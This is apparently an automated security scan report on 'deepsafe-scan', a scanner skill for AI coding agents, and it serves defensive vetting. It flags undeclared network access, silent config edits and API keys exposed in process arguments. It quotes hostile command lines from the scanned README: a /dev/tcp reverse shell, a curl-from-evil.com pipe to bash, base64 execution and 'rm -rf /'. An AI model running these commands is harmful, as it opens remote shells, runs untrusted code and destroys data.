High Risk — Risk Score 68/100
Last scan: 23 hr ago
deepsafe-scan
Preflight security scanner for AI coding agents - scans deployment config, skills/MCP servers, memory/sessions, and AI agent config files
DeepSafe Scan is a legitimate security scanner but contains undeclared behaviors: auto-modifies openclaw.json config to enable endpoints, and uses network access via subprocess that is not declared in allowed-tools.
Skill Name: deepsafe-scan
Duration: 77.2s
Engine: pi
Do not install this skill
Do not install without explicit user consent. Request network access declaration in SKILL.md. Review config auto-modification behavior.

Attack Chain (5 steps)

1. Entry: Skill installed via legitimate OpenClaw marketplace (SKILL.md:1)
2. Escalation: Scanner reads user's openclaw.json config (scripts/scan.py:1)
3. Escalation: Auto-modifies openclaw.json to enable chatCompletions endpoint (scripts/llm_client.py:213)
4. Escalation: Credential auto-detection accesses ANTHROPIC_API_KEY/OPENAI_API_KEY from environment (scripts/llm_client.py:124)
5. Escalation: API key passed to subprocess as argv, visible in process listing (scripts/scan.py:88)

Findings (5 items)

[High] Network access not declared in SKILL.md (Doc Mismatch)
Location: scripts/llm_client.py:1
The skill uses urllib to make HTTP requests to LLM APIs (api.anthropic.com, api.openai.com, OpenClaw Gateway) but SKILL.md only declares Bash(python3:*), Bash(cat:*), and Read. Network access is a critical permission that should be declared.
Evidence: urllib.request.Request with Bearer token to LLM endpoints
→ Add network:READ to allowed-tools declaration in SKILL.md, or restructure to use only declared shell access for all network operations

[High] Auto-modifies openclaw.json without user consent (Priv Escalation)
Location: scripts/llm_client.py:213
The _ensure_chat_completions_enabled() function silently modifies the user's openclaw.json config to enable the chatCompletions endpoint. This unauthorized configuration change bypasses user consent and trust boundaries.
Evidence: cfg.setdefault(...).setdefault(...).setdefault(...).setdefault('chatCompletions', {})['enabled'] = True
→ Remove auto-modification or prompt user explicitly before making config changes

[Medium] API credentials passed as command-line arguments (Credential Theft)
Location: scripts/scan.py:88
Probe scripts receive --api-key via subprocess.run() argv, exposing credentials in the process listing (visible via ps). While necessary for function, this exposes secrets to process inspection.
Evidence: cmd = [sys.executable, str(script), '--api-base', api_base, '--api-key', client.api_key, ...]
→ Use environment variables or file-based credential passing instead of argv

[Medium] Auto-detection of API credentials from multiple sources (Sensitive Access)
Location: scripts/llm_client.py:124
The LLM client auto-detects and uses credentials from OpenClaw config, environment variables (ANTHROPIC_API_KEY, OPENAI_API_KEY), and explicit arguments. While necessary for the scanner's function, this represents invasive credential access.
Evidence: anthropic_key = os.environ.get('ANTHROPIC_API_KEY', '')
→ Document this behavior clearly and provide --no-llm option to disable credential detection

[Low] README.md contains example malicious patterns (Doc Mismatch)
Location: README.md:155
README.md lines 155-161 contain documented examples of dangerous patterns (reverse shell, curl|bash RCE, base64 exec, rm -rf). These are documentation/examples of what the scanner detects, not actual malicious code, but could trigger false positives in some scanners.
Evidence: bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
→ Move these examples to a separate 'threat-patterns' reference document to avoid confusion
Resource | Declared | Inferred | Status | Evidence
Filesystem | READ | READ | ✓ Aligned | SKILL.md: allowed-tools includes Read
Shell | WRITE | WRITE | ✓ Aligned | SKILL.md: allowed-tools includes Bash(python3:*), Bash(cat:*)
Network | NONE | READ | ✗ Violation | scripts/scan.py: subprocess runs probes making urllib HTTP calls; llm_client.py:…
Environment | NONE | READ | ✗ Violation | llm_client.py: reads ANTHROPIC_API_KEY, OPENAI_API_KEY, OPENCLAW_GATEWAY_TOKEN
15 findings (5 Critical)

Critical: Dangerous Shell Command "bash -i >&" (README.md:155)
Critical: Dangerous Shell Command "/dev/tcp/" (README.md:155)
Critical: Dangerous Shell Command "curl https://evil.com/x.sh | bash" (README.md:156)
Critical: Encoded Execution (Base64, code obfuscation) "base64 -d" (README.md:159)
Critical: Dangerous Shell Command "rm -rf /" (README.md:161)
Medium: External URL https://img.shields.io/badge/python-3.9%2B-blue.svg (README.md:5)
Medium: External URL https://python.org (README.md:5)
Medium: External URL https://img.shields.io/badge/deps-zero-green.svg (README.md:6)
Medium: External URL https://img.shields.io/badge/works%20with-OpenClaw%20%7C%20Claude%20Code%20%7C%20Cursor%20%7C%20Codex-blueviolet.svg (README.md:7)
Medium: External URL https://evil.com/x.sh (README.md:156)
Medium: External URL https://healthcheck.dev-tools.sh/ping (demo/awesome-ai-rules/AGENTS.md:19)
Medium: External URL https://api.analytics-cdn.dev/v1/event (demo/awesome-ai-rules/CLAUDE.md:15)
Medium: External URL http://127.0.0.1:11434/v1 (scripts/probes/persuasion_probe.py:391)
Medium: External URL https://hooks\.slack\.com/services/T[A-Z0-9 (scripts/scan.py:932)
Info: Email address [email protected] (README.md:157)

File Tree

19 files · 264.4 KB · 5683 lines
Python: 6 files, 3481 lines · Markdown: 8 files, 1232 lines · JSON: 4 files, 967 lines · Text: 1 file, 3 lines

├─ 📁 data
│  ├─ 📋 halueval_samples.json  JSON 901L · 65.9 KB
│  ├─ 📋 manipulation_persuasion_topics.json  JSON 40L · 981 B
│  ├─ 📋 prompts.json  JSON 21L · 5.0 KB
│  └─ 📄 qa_evaluation_instruction.txt  Text 3L · 224 B
├─ 📁 demo
│  └─ 📁 awesome-ai-rules
│     ├─ 📝 AGENTS.md  Markdown 24L · 473 B
│     ├─ 📝 CLAUDE.md  Markdown 26L · 627 B
│     └─ 📝 README.md  Markdown 26L · 681 B
├─ 📁 docs
│  └─ 📝 plan-cross-platform-evolution.md  Markdown 615L · 22.6 KB
├─ 📁 scripts
│  ├─ 📁 probes
│  │  ├─ 🐍 deception_probe.py  Python 483L · 19.5 KB
│  │  ├─ 🐍 halueval_probe.py  Python 327L · 11.4 KB
│  │  ├─ 🐍 persuasion_probe.py  Python 475L · 17.8 KB
│  │  └─ 🐍 sandbagging_probe.py  Python 415L · 14.3 KB
│  ├─ 🐍 llm_client.py  Python 234L · 8.7 KB
│  └─ 🐍 scan.py  Python 1547L · 75.9 KB
├─ 📋 _meta.json  JSON 5L · 132 B
├─ 📝 AGENTS.md  Markdown 75L · 2.5 KB
├─ 📝 CLAUDE.md  Markdown 79L · 2.5 KB
├─ 📝 README.md  Markdown 255L · 9.3 KB
└─ 📝 SKILL.md  Markdown 132L · 5.9 KB

Dependencies (1 item)

Package | Version | Source | Known Vulns | Notes
urllib (stdlib) | N/A | python3 built-in | No | Zero external dependencies

Security Positives

✓ Uses only Python stdlib (no external dependencies) - reduces supply chain risk
✓ Skips LLM features gracefully when no API credentials found (--no-llm flag works)
✓ Legitimate security scanning tool with documented purpose
✓ Probes are executed as subprocess with python3 - aligned with declared Bash(python3:*) permission
✓ Open source with transparent implementation